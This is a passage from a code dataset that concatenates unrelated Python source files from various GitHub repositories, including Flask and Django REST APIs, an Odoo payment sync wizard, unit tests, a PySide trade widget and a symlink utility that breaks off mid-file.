TestBinaryNodeFromString(unittest.TestCase):\n def setUp(self):\n self.mock_binary_tree = genetics.BinaryNode(\n [\n genetics.BinaryNode(\n [\n genetics.BinaryNode(nodetype=1)\n ], nodetype=4),\n genetics.BinaryNode(\n [\n genetics.BinaryNode(\n [\n genetics.BinaryNode(nodetype=3),\n genetics.BinaryNode(nodetype=2)\n ],nodetype=2)\n ], nodetype=4)\n ], nodetype=1\n )\n self.mock_binary_tree_str = 'BinaryNode: 1(4(1),4(2(3,2)))'\n\n def test_from_string(self):\n actual = genetics.BinaryNode.from_string(self.mock_binary_tree_str)\n expected = self.mock_binary_tree_str\n self.assertEqual(str(actual), expected)\n\n def test_str(self):\n actual = str(self.mock_binary_tree)\n expected = self.mock_binary_tree_str\n self.assertEqual(actual, expected)\n\nclass TestBinaryNode(unittest.TestCase):\n def test_validate_children(self):\n non_iterable_children = genetics.Node(nodetype=1)\n with self.assertRaises(ValueError):\n genetics.BinaryNode(children=non_iterable_children)\n non_node_children = [genetics.Node(nodetype=1), 'a']\n with self.assertRaises(ValueError):\n genetics.BinaryNode(children=non_node_children)\n too_long_children = [\n genetics.Node(nodetype=1),\n genetics.Node(nodetype=2),\n genetics.Node(nodetype=3)\n ]\n with self.assertRaises(ValueError):\n genetics.BinaryNode(children=too_long_children)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"eugeneh1217/sims","sub_path":"sims/agents/test/test_genetics.py","file_name":"test_genetics.py","file_ext":"py","file_size_in_byte":14340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13844978701","text":"import os, sys\nfrom shutil import rmtree, copyfile\nimport numpy as np\nfrom tqdm import tqdm\n\ndef getPath():\n return os.path.dirname(os.path.abspath(__file__))\n\ndef getDatesetPath():\n return getPath() + '/images1024x1024'\n\ndef sample(train_size, valid_size, init=True):\n\n if not (0 <= train_size <= 70000 and 0 <= valid_size <= 70000):\n raise ValueError('ValueError: sample: Size must be integer between 0~70000')\n\n train_set_path = f'{getPath()}/train_set'\n valid_set_path = f'{getPath()}/valid_set'\n\n def initSampler():\n for dir in [train_set_path, valid_set_path]:\n if os.path.isdir(dir):\n rmtree(dir)\n os.mkdir(train_set_path)\n os.mkdir(train_set_path+'/ori')\n\n os.mkdir(valid_set_path)\n os.mkdir(valid_set_path+'/ori')\n\n def index2path(index):\n filename = str(index).zfill(5) + '.png'\n filename = filename[0:2] + \"000/\" + filename\n return f'{getDatesetPath()}/{filename}'\n\n if init: \n initSampler()\n\n full_index = np.random.permutation(70000)\n train_index = full_index[:train_size]\n valid_index = full_index[-valid_size:]\n\n\n for (dir, index) in [(train_set_path, train_index), (valid_set_path, valid_index)]:\n for i, id in tqdm(enumerate(index), desc=dir[-9:]):\n src_path = index2path(id)\n copyfile(src_path, f'{dir}/ori/{str(i).zfill(5)}.png')\n\nif __name__ == '__main__':\n\n try:\n if len(sys.argv) != 3:\n raise ValueError('Usage: python3 dataset-slicer.py ')\n\n train_size = int(sys.argv[1])\n valid_size = int(sys.argv[2])\n\n if not (0 <= train_size <= 70000 and 0 <= valid_size <= 70000):\n raise ValueError('Error: Size must be integer between 0~70000')\n\n if not os.path.isdir(getDatesetPath()): \n raise ValueError(\"Error: Dataset directory doesn't exist.\")\n \n sample(train_size, valid_size)\n\n\n except ValueError as e:\n print(e)\n exit()\n","repo_name":"SaintWatson/Face-Renovation-Project","sub_path":"dataset/DataSampler.py","file_name":"DataSampler.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5735968231","text":"# coding=utf-8\nfrom flask import Flask, jsonify, request\nfrom flask_restful import Resource, Api, reqparse\nfrom pymongo import MongoClient\nimport json\n\napp = Flask(__name__)\napi = Api(app)\n\nclienteMongo = MongoClient('localhost', 27017)\ndb = clienteMongo['usuariosDB']\ndbPropetarios = db.propetarios\n\nclass Propetario(Resource):\n \"\"\"This is the class propert.\"\"\"\n @app.route(methods=['POST'])\n def post(self):\n \"\"\"Return the Objects insert\"\"\"\n json_data = request.get_json(force=True)\n idC = json_data['idP']\n estadoActual = json_data['EstadoActual']\n healthCheck = json_data['HealthCheck']\n horarios = json_data['Horarios']\n propetarios = json_data['Propetarios']\n guardar = {\n 'idC': idC,\n 'EstadoActual': estadoActual,\n 'HealthCheck': healthCheck,\n 'Horarios': horarios,\n 'Propetarios': propetarios\n }\n dbPropetarios.insert_one(guardar).inserted_id\n return jsonify(idH=idC, EstadoActual=estadoActual, HealthCheck=healthCheck, Horarios=horarios,\n Propetarios=propetarios)\n\n\napi.add_resource(Propetario, '/propetarios')\n# api.add_resource(PropetarioID, '/propetarios/')\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"dfriveros11/Arquisoft","sub_path":"TypesOfUsers/Propetario.py","file_name":"Propetario.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8354172314","text":"from metricbeat.metricbeat import BaseTest\n\nclass Test(BaseTest):\n\n def test_base(self):\n \"\"\"\n Basic test with exiting Mockbeat normally\n \"\"\"\n self.render_config_template(\n )\n\n proc = self.start_beat()\n self.wait_until( lambda: self.log_contains(\"Init Beat\"))\n exit_code = proc.kill_and_wait()\n assert exit_code == 0\n","repo_name":"jasperla/hwsensorsbeat","sub_path":"vendor/github.com/elastic/beats/metricbeat/tests/system/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"16677543235","text":"from datetime import datetime\n\nfrom flask_restful import Resource\nfrom flask import request\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\n\nfrom models.case import CaseModel\nfrom models.case_history import CaseHistoryModel\n\nstatuses = { # dict of allowed statuses of cases\n 'New': 1,\n 'Planned': 2,\n 'In progress': 3,\n 'Completed': 4\n}\n\nlogs = [] # list of temporary logs, that not commited yet.\n\n\ndef logging_of_editing(field: str, old: str, new: str, case_id: int):\n \"\"\"\n Create record of changing in case table and append to logs list\n :param field: Changed field\n :param old: Old value\n :param new: New value\n :param case_id: Id of case, that has changed\n \"\"\"\n operation = field + \": '\" + old + \"' -> '\" + new + \"'.\"\n new_log = CaseHistoryModel(operation, case_id)\n new_log.save_to_db()\n logs.append(new_log)\n\n\ndef commit_of_logging():\n \"\"\"\n Commit saved all logs from logs-list.\n Clear up logs-list.\n \"\"\"\n for log in logs:\n log.commit_changes()\n logs.clear()\n\n\ndef abort_of_logging():\n \"\"\"\n Abort commiting of logs\n \"\"\"\n logs.clear()\n\n\nclass Case(Resource):\n @jwt_required\n def get(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: GET\n\n Headers: Authorization - \"Bearer {{access_token}}\"\n Input: {\n \"status\": \"new/planned/in_progress/completed\" (optional)\n \"end_time\": \"Hour:Minutes Day.Month.Year\" (optional)\n }\n :return: List of cases\n \"\"\"\n data = request.get_json() # get data from request\n try:\n user = get_jwt_identity() # get user id\n if not data: # setting up an empty dict if no parameters in request\n data = {}\n\n if \"end_time\" not in data:\n data['end_time'] = \"%%\" # setting as \"any\"-format for sql-request\n else:\n try:\n data['end_time'] = str(datetime.strptime(data['end_time'], '%H:%M:%S %d.%m.%Y'))\n except:\n return {'message': 'Incorrect datetime format'}, 400\n\n if \"status\" not in data:\n data['status'] = \"%%\" # setting as \"any\"-format for sql-request\n elif data['status'] in statuses:\n data['status'] = statuses[data['status']] # setting as status_id\n else:\n return {'message': \"Wrong status format. \"\n \"Available statuses: New, Planned, In progress, Completed\"}, 400\n cases = [case.json() for case in CaseModel.find_all_by_user_id(user, data['status'], data['end_time'])]\n return {'cases': cases}, 200\n except:\n return {'message': 'Internal server error'}, 500\n\n @jwt_required\n def post(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: POST\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\",\n \"description\": \"some description\"\n \"end_time\": \"Hour:Minutes Day.Month.Year\",\n }\n :return: JSON of created case.\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n if len(data['name']) > 30:\n return {'message': \"Name is too long. Max length is 30 symbols\"}, 400\n if CaseModel.find_by_name_and_user_id(data['name'], user):\n return {'message': \"An case with name '{}' already exists.\".format(data['name'])}, 400\n if len(data['description']) > 256:\n return {'message': \"Description is too long. Max length is 256 symbols\"}, 400\n\n try:\n end_time = datetime.strptime(data['end_time'], '%H:%M:%S %d.%m.%Y')\n except:\n return {'message': 'Incorrect datetime format'}, 400\n\n if end_time < datetime.now():\n return {'message': \"This end_time has passed.\"}\n else:\n data['end_time'] = str(end_time)\n case = CaseModel(**data, user_id=user)\n\n try:\n case.save_to_db()\n except:\n return {\"message\": \"An error occurred inserting the case.\"}, 500\n logging_of_editing('Creating', '', data['name'], case.id)\n commit_of_logging()\n except:\n abort_of_logging()\n return {'message': 'Internal server error'}, 500\n return case.json(), 201\n\n @jwt_required\n def delete(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: DELETE\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\"\n }\n :return: JSON of report message\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n case = CaseModel.find_by_name_and_user_id(data['name'], user)\n if case:\n case.delete_from_db()\n return {'message': 'Case deleted.'}\n return {'message': 'Case not found.'}, 404\n except:\n return {'message': 'Internal server error'}, 500\n\n @jwt_required\n def put(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: PUT\n\n Updates received fields and logging changes to case_history table\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\",\n \"new_name\": \"new name of the case\" (optional)\n \"new_description\": \"some new some description\" (optional)\n \"new_status\": \"new/planned/in_progress/completed\", (optional)\n \"new_end_time\": \"Hour:Minutes Day.Month.Year\", (optional)\n }\n :return: JSON of edited case\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n case = CaseModel.find_by_name_and_user_id(data['name'], user)\n if case:\n if 'new_name' in data:\n if len(data['new_name']) > 30:\n return {'message': \"New name is too long. Max length is 30 symbols\"}, 400\n if CaseModel.find_by_name_and_user_id(data['new_name'], user):\n return {'message': \"An case with name '{}' already exists.\".format(data['new_name'])}, 400\n if case.name != data['new_name']:\n logging_of_editing(field='Name', old=case.name, new=data['new_name'], case_id=case.id)\n case.name = data['new_name']\n\n if 'new_description' in data:\n if len(data['new_description']) > 256:\n return {'message': \"New description is too long. Max length is 256 symbols\"}, 400\n if case.description != data['new_description']:\n logging_of_editing(field='Description', old=case.description, new=data['new_description'],\n case_id=case.id)\n case.description = data['new_description']\n\n if 'new_status' in data:\n if data['new_status'] in statuses:\n if case.status_id != statuses[data['new_status']]:\n logging_of_editing(field='Status', old=case.status.name, new=data['new_status'],\n case_id=case.id)\n case.status_id = statuses[data['new_status']]\n else:\n return {'message': \"Wrong status format. \"\n \"Available statuses: New, Planned, In progress, Completed\"}, 400\n\n if 'new_end_time' in data:\n try:\n new_end_time = datetime.strptime(data['new_end_time'], '%H:%M:%S %d.%m.%Y')\n except:\n return {'message': 'Incorrect datetime format'}, 400\n if new_end_time < case.start_time:\n return {'message': \"This new end_time has passed.\"}\n else:\n if str(case.end_time) != str(new_end_time):\n logging_of_editing(field='end_time', old=str(case.end_time), new=str(new_end_time),\n case_id=case.id)\n case.end_time = str(new_end_time)\n\n else:\n return {'message': 'Case not found.'}, 404\n try:\n case.save_to_db()\n commit_of_logging()\n except:\n abort_of_logging()\n return {\"message\": \"An error occurred updating the case.\"}, 500\n except:\n abort_of_logging()\n return {'message': 'Internal server error'}, 500\n return case.json()\n\n\nclass CaseHistory(Resource):\n @classmethod\n @jwt_required\n def post(cls):\n \"\"\"\n URL: http://{{server_url}}/case_history\n METHOD: POST\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\"\n }\n :return: JSON of history of case.\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n case = CaseModel.find_by_name_and_user_id(data['name'], user)\n if case:\n case_id = case.id\n case_history = [history.json() for history in CaseHistoryModel.find_all_by_case_id(case_id)]\n return {'history': case_history}, 200\n else:\n return {'message': 'Case not found'}, 404\n except:\n return {'message': 'Internal server error'}, 500\n","repo_name":"sapiely/test_exercise","sub_path":"resources/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6677123911","text":"import sys\nfrom collections import defaultdict\n\nINVALID_CHARS = ',:;.()[]{}'\ndef clear(w):\n\treturn w.strip(INVALID_CHARS)\n\nm = defaultdict(int)\nfor line in sys.stdin:\n\tfor word in line.split():\n\t\tm[clear(word)] += 1\n\nfor item in sorted(m.items(), key=lambda item: item[1], reverse=True):\n\tprint(item[0], item[1])\n","repo_name":"lbolla/stanford-cs240h","sub_path":"lab1/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1200889344","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import ValidationError\n\ntry:\n import erppeek\nexcept Exception:\n raise ValidationError('La libraire de synchronisation est manquante!')\n\n\nclass AccountPaymentSynch(models.TransientModel):\n _name = 'account.payment.synch'\n\n def synchronise_payment(self):\n active_ids = self._context.get('active_ids')\n payment_ids = self.env['account.payment'].search([('id', 'in', active_ids)])\n\n\n SERVER = self.env.user.company_id.second_base_url\n client = erppeek.Client(server=SERVER)\n try:\n client.login(database=self.env.user.company_id.db_name,\n user=self.env.user.company_id.admin_user, password=self.env.user.company_id.admin_password)\n except Exception as e:\n raise ValidationError('Erreur de connection à la deuxième base')\n\n for payment in payment_ids:\n # verifier si la facture n'est pas deja synchronisée\n\n sync_payment = client.search('account.payment', [('synch_id', '=', payment.id)])\n # Préparation du dictionnaire de la facture\n if not sync_payment:\n vals= {\n 'payment_date': payment.payment_date,\n 'amount': payment.amount,\n \"payment_type\": payment.payment_type,\n \"partner_type\": payment.partner_type,\n \"communication\": payment.communication,\n 'name': payment.name,\n 'synch_id': payment.id\n }\n\n payment_partner = payment.partner_id\n # Rechercher le partenaire sinon le créer\n\n partner_id = client.search('res.partner', [('synch_id', '=', payment_partner.id)])\n if partner_id:\n vals['partner_id'] = partner_id[0]\n else:\n partner = client.create('res.partner',{'name': payment_partner.name,\n 'street': payment_partner.street,\n 'street2': payment_partner.street2,\n 'city': payment_partner.city,\n 'phone': payment_partner.phone,\n 'mobile': payment_partner.mobile,\n 'email': payment_partner.email,\n 'ref': payment_partner.ref,\n 'synch_id': payment_partner.id,\n 'supplier_rank': payment_partner.supplier_rank,\n 'customer_rank': payment_partner.customer_rank,\n 'zip': payment_partner.zip,\n 'country_id': payment_partner.country_id and payment_partner.country_id.id,\n\n })\n vals['partner_id'] = partner.id\n\n\n\n if payment.journal_id:\n # Rechercher le journal sinon le créer\n\n journal_id = client.search('account.journal', [('name', '=', payment.journal_id.name)])\n\n if journal_id:\n vals['journal_id'] = journal_id[0]\n else:\n raise ValidationError(\"Le journal %s n'a pa pu être reperé dans la base de destination!\" % payment.journal_id.name)\n if payment.currency_id:\n # Rechercher le journal sinon le créer\n\n currency = client.search('res.currency', [('name', '=', payment.currency_id.name)])\n\n if currency:\n vals['currency_id'] = currency[0]\n else:\n raise ValidationError(\"La devise %s n'a pa pu être reperé dans la base de destination!\" % payment.currency_id.name)\n\n payment_method = client.search('account.payment.method',[('code', '=', 'manual'), ('payment_type', '=', payment.payment_type)])\n vals['payment_method_id'] = payment_method[0]\n new_payment = client.create('account.payment',vals)\n payment.synch_id = new_payment\n if payment.state not in ('draft', 'cancelled'):\n print('payment.invoice_ids', payment.reconciled_invoice_ids)\n if payment.reconciled_invoice_ids:\n invoices = client.search('account.move', [('synch_id', 'in', payment.reconciled_invoice_ids.mapped('id'))])\n print('invoices', invoices)\n if len(invoices)>0:\n\n client.write('account.payment', new_payment, {'invoice_ids': invoices})\n\n\n client.execute('account.payment', 'post', new_payment)\n return True","repo_name":"mouadhamri/hbsolutions_sync","sub_path":"accounting_synch/wizard/account_payment_synch.py","file_name":"account_payment_synch.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9995306161","text":"from datetime import datetime\nfrom dateutil import tz\n\nfrom PySide6.QtCore import Qt\nfrom PySide6.QtWidgets import QLabel, QDateTimeEdit, QDateEdit, QLineEdit\nfrom jal.widgets.abstract_operation_details import AbstractOperationDetails\nfrom jal.widgets.reference_selector import AccountSelector, AssetSelector\nfrom jal.widgets.delegates import WidgetMapperDelegateBase\nfrom jal.db.operations import LedgerTransaction\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass TradeWidgetDelegate(WidgetMapperDelegateBase):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.delegates = {'timestamp': self.timestamp_delegate,\n 'settlement': self.timestamp_delegate,\n 'asset_id': self.symbol_delegate,\n 'qty': self.decimal_long_delegate,\n 'price': self.decimal_long_delegate,\n 'fee': self.decimal_long_delegate}\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass TradeWidget(AbstractOperationDetails):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.name = self.tr(\"Buy / Sell\")\n self.operation_type = LedgerTransaction.Trade\n\n self.date_label = QLabel(self)\n self.settlement_label = QLabel()\n self.number_label = QLabel(self)\n self.account_label = QLabel(self)\n self.symbol_label = QLabel(self)\n self.qty_label = QLabel(self)\n self.price_label = QLabel(self)\n self.fee_label = QLabel(self)\n self.comment_label = QLabel(self)\n\n self.main_label.setText(self.name)\n self.date_label.setText(self.tr(\"Date/Time\"))\n self.settlement_label.setText(self.tr(\"Settlement\"))\n self.number_label.setText(self.tr(\"#\"))\n self.account_label.setText(self.tr(\"Account\"))\n self.symbol_label.setText(self.tr(\"Asset\"))\n self.qty_label.setText(self.tr(\"Qty\"))\n self.price_label.setText(self.tr(\"Price\"))\n self.fee_label.setText(self.tr(\"Fee\"))\n self.comment_label.setText(self.tr(\"Note\"))\n\n self.timestamp_editor = QDateTimeEdit(self)\n self.timestamp_editor.setCalendarPopup(True)\n self.timestamp_editor.setTimeSpec(Qt.UTC)\n self.timestamp_editor.setFixedWidth(self.timestamp_editor.fontMetrics().horizontalAdvance(\"00/00/0000 00:00:00\") * 1.25)\n self.timestamp_editor.setDisplayFormat(\"dd/MM/yyyy hh:mm:ss\")\n self.settlement_editor = QDateEdit(self)\n self.settlement_editor.setCalendarPopup(True)\n self.settlement_editor.setTimeSpec(Qt.UTC)\n self.settlement_editor.setFixedWidth(self.settlement_editor.fontMetrics().horizontalAdvance(\"00/00/0000\") * 1.5)\n self.settlement_editor.setDisplayFormat(\"dd/MM/yyyy\")\n self.account_widget = AccountSelector(self)\n self.asset_widget = AssetSelector(self)\n self.qty_edit = QLineEdit(self)\n self.qty_edit.setAlignment(Qt.AlignRight)\n self.price_edit = QLineEdit(self)\n self.price_edit.setAlignment(Qt.AlignRight)\n self.fee_edit = QLineEdit(self)\n self.fee_edit.setAlignment(Qt.AlignRight)\n self.number = QLineEdit(self)\n self.comment = QLineEdit(self)\n\n self.layout.addWidget(self.date_label, 1, 0, 1, 1, Qt.AlignLeft)\n self.layout.addWidget(self.account_label, 2, 0, 1, 1, Qt.AlignLeft)\n self.layout.addWidget(self.symbol_label, 3, 0, 1, 1, Qt.AlignLeft)\n self.layout.addWidget(self.comment_label, 4, 0, 1, 1, Qt.AlignLeft)\n\n self.layout.addWidget(self.timestamp_editor, 1, 1, 1, 1, Qt.AlignLeft)\n self.layout.addWidget(self.account_widget, 2, 1, 1, 4)\n self.layout.addWidget(self.asset_widget, 3, 1, 1, 4)\n self.layout.addWidget(self.comment, 4, 1, 1, 4)\n\n self.layout.addWidget(self.settlement_label, 1, 2, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.settlement_editor, 1, 3, 1, 1, Qt.AlignLeft)\n\n self.layout.addWidget(self.number_label, 1, 5, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.qty_label, 2, 5, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.price_label, 3, 5, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.fee_label, 4, 5, 1, 1, Qt.AlignRight)\n\n self.layout.addWidget(self.number, 1, 6, 1, 1)\n self.layout.addWidget(self.qty_edit, 2, 6, 1, 1)\n self.layout.addWidget(self.price_edit, 3, 6, 1, 1)\n self.layout.addWidget(self.fee_edit, 4, 6, 1, 1)\n\n self.layout.addWidget(self.commit_button, 0, 8, 1, 1)\n self.layout.addWidget(self.revert_button, 0, 9, 1, 1)\n\n self.layout.addItem(self.verticalSpacer, 6, 6, 1, 1)\n self.layout.addItem(self.horizontalSpacer, 1, 6, 1, 1)\n\n super()._init_db(\"trades\")\n self.mapper.setItemDelegate(TradeWidgetDelegate(self.mapper))\n\n self.account_widget.changed.connect(self.mapper.submit)\n self.asset_widget.changed.connect(self.mapper.submit)\n\n self.mapper.addMapping(self.timestamp_editor, self.model.fieldIndex(\"timestamp\"))\n self.mapper.addMapping(self.settlement_editor, self.model.fieldIndex(\"settlement\"))\n self.mapper.addMapping(self.account_widget, self.model.fieldIndex(\"account_id\"))\n self.mapper.addMapping(self.asset_widget, self.model.fieldIndex(\"asset_id\"))\n self.mapper.addMapping(self.number, self.model.fieldIndex(\"number\"))\n self.mapper.addMapping(self.qty_edit, self.model.fieldIndex(\"qty\"))\n self.mapper.addMapping(self.price_edit, self.model.fieldIndex(\"price\"))\n self.mapper.addMapping(self.fee_edit, self.model.fieldIndex(\"fee\"))\n self.mapper.addMapping(self.comment, self.model.fieldIndex(\"note\"))\n\n self.model.select()\n\n def prepareNew(self, account_id):\n new_record = super().prepareNew(account_id)\n new_record.setValue(\"timestamp\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"settlement\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"number\", '')\n new_record.setValue(\"account_id\", account_id)\n new_record.setValue(\"asset_id\", 0)\n new_record.setValue(\"qty\", '0')\n new_record.setValue(\"price\", '0')\n new_record.setValue(\"fee\", '0')\n new_record.setValue(\"note\", None)\n return new_record\n\n def copyToNew(self, row):\n new_record = self.model.record(row)\n new_record.setNull(\"id\")\n new_record.setValue(\"timestamp\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"settlement\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"number\", '')\n return new_record","repo_name":"titov-vv/jal","sub_path":"jal/widgets/trade_widget.py","file_name":"trade_widget.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"27"} +{"seq_id":"20857469859","text":"from django.urls import reverse\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase, force_authenticate\nfrom rest_framework.authtoken.models import Token\n\nfrom reviewsapi.models import Review\n\n\nclass ReviewListCreateRetrieveTests(APITestCase):\n \"\"\"Test case for listing, creating and retrieving reviews\"\"\"\n def setUp(self):\n self.username = 'johndoe'\n self.email = 'john@doe.com'\n self.password = 'trustno1'\n self.user = User.objects.create_user(self.username, self.email,\n self.password)\n self.token = Token.objects.get(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)\n\n def test_can_get_apiroot(self):\n \"\"\"Ensure the api root is configured\"\"\"\n url = reverse('api-root')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_can_list_reviews(self):\n \"\"\"Ensure we can list the reviews\"\"\"\n url = reverse('review-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_can_create_review(self):\n \"\"\"Ensure we can create a review\n\n Criteria: Users are able to submit reviews to the API\n Criteria: Submitted reviews must include, at least, the following attributes\n \"\"\"\n url = reverse('review-list')\n review = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 3,\n \"author\": \"John\",\n }\n response = self.client.post(url, review)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_cannot_create_review_rating_higher_than_5(self):\n \"\"\"Ensure we cannot create a review with a rating higher than 5\n\n Criteria: Rating - must be between 1 - 5\n \"\"\"\n url = reverse('review-list')\n review = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 6,\n \"author\": \"John\",\n }\n response = self.client.post(url, review)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_cannot_create_review_rating_lower_than_1(self):\n \"\"\"Ensure we cannot create a review with a rating lower than 1\n\n Criteria: Rating - must be between 1 - 5\n \"\"\"\n url = reverse('review-list')\n review = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 0,\n \"author\": \"John\",\n }\n response = self.client.post(url, review)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_can_retrieve_review(self):\n \"\"\"Ensure we can retrieve a review created by us\n\n Criteria: Users are able to retrieve reviews that they submitted\n \"\"\"\n review_data = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 3,\n \"author\": \"John\",\n \"ip_addr\": \"127.0.0.1\",\n \"user\": self.user,\n }\n review = Review.objects.create(**review_data)\n url = reverse('review-detail', args=(review.pk,))\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_cannot_retrieve_other_users_reviews(self):\n \"\"\"Ensure we cannot retrieve a review created by other users\n\n Criteria: Users cannot see reviews submitted by other users\n \"\"\"\n another_user = User.objects.create(username='anotheruser')\n review_data = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 3,\n \"author\": \"John\",\n \"ip_addr\": \"127.0.0.1\",\n \"user\": another_user,\n }\n review = Review.objects.create(**review_data)\n url = reverse('review-detail', args=(review.pk,))\n response = self.client.get(url)\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass ApiAuthTests(APITestCase):\n \"\"\"Test case for detecting unauthenticated access to the api\"\"\"\n def test_noauth_cannot_get_apiroot(self):\n \"\"\"Nobody is allowed to access the API without auth token\n\n Criteria: Use of the API requires a unique auth token for each user\n \"\"\"\n url = reverse('api-root')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_noauth_cannot_list_reviews(self):\n \"\"\"Nobody is allowed to list reviews without proper authentication\"\"\"\n url = reverse('review-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_noauth_cannot_create_review(self):\n \"\"\"Nobody is allowed to create reviews without proper authentication\"\"\"\n url = reverse('review-list')\n review = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 3,\n \"author\": \"John\",\n }\n response = self.client.post(url, review)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n","repo_name":"mscansian/reviewsapi","sub_path":"webservice/reviewsapi/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"335758344","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Move a symbolic link to another directory, adjusting the link contents.\"\"\"\n\n__author__ = \"\"\"Eugene M. Kim\"\"\"\n__email__ = 'astralblue@gmail.com'\n__version__ = '0.1.1'\n\nimport argparse\nimport errno\nimport logging\nimport os\nimport os.path\nimport stat\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n\nclass ArgumentError(RuntimeError):\n \"\"\"An invalid argument was given.\n\n `~BaseException.args` contain (*desc*, *src*, *dst*), where:\n\n - *desc* is a human-readable description of the nature of the error;\n - *src* is the source symbolic link;\n - *dst* is the destination.\n \"\"\"\n\n\nclass OperationError(RuntimeError):\n \"\"\"An underlying operation failed.\n\n :py:attr:`~BaseException.args` contain (*desc*), where *desc* is a\n human-readable description of the failed operation.\n\n The `__cause__` attribute may contains the underlying root cause exception;\n it is often an `OSError`.\n \"\"\"\n\n\ndef _do(action, descr):\n logger.debug(descr)\n try:\n return action()\n except Exception as e:\n raise OperationError(\"cannot {}: {}\".format(descr, e)) from e\n\n\ndef _fsdecode(path):\n return _do(lambda: os.fsdecode(path), \"normalize path {!r}\".format(path))\n\n\ndef _isdir(path):\n return _do(lambda: os.path.isdir(path),\n \"check if {!r} is a directory\".format(path))\n\n\ndef _unlink_if_exists(path):\n try:\n _do(lambda: os.unlink(path), \"unlink {!r}\".format(path))\n except OperationError as e:\n cause = e.__cause__\n if isinstance(cause, OSError) or cause.errno != errno.ENOENT:\n raise\n\n\ndef move_symlink(src, dst):\n \"\"\"Move a symbolic link to another directory, adjusting the link contents.\n\n :param src: source symbolic link.\n :type src: a :term:`path-like object`\n :param dst:\n destination; must either not exist or be an existing directory. If an\n existing directory, move the source 